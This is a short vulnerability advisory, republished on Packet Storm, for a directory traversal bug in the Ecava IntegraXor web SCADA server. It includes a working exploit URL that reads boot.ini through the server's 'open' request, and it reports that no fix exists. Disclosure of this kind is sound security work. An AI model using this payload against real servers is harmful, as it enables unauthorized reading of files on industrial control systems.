Ecava IntegraXor versions 3.6.4000.0 and below suffer from a directory traversal vulnerability.
307bd3de5b07f9cc3534f5b020bae6c51c595e3537568512c5d329f78adbb0b9#######################################################################
Luigi Auriemma
Application: Ecava IntegraXor
http://www.integraxor.com
Versions: <= 3.6.4000.0
Platforms: Windows
Bug : directory traversal
Exploitation: remote, versus server
Date: 21 Dec 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
IntegraXor is a web SCADA server used primarily in Malaysia.
#######################################################################
======
2) Bug
======
The "open" request can be used by an attacker to download files from
the disk where the server is installed through directory traversal
attacks.
#######################################################################
===========
3) The Code
===========
http://SERVER:7131/PROJECT_NAME/open?file_name=..\..\..\..\..\..\..\..\..\..\..\boot.ini
where PROJECT_NAME is the name of one of the projects hosted by the
server.
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed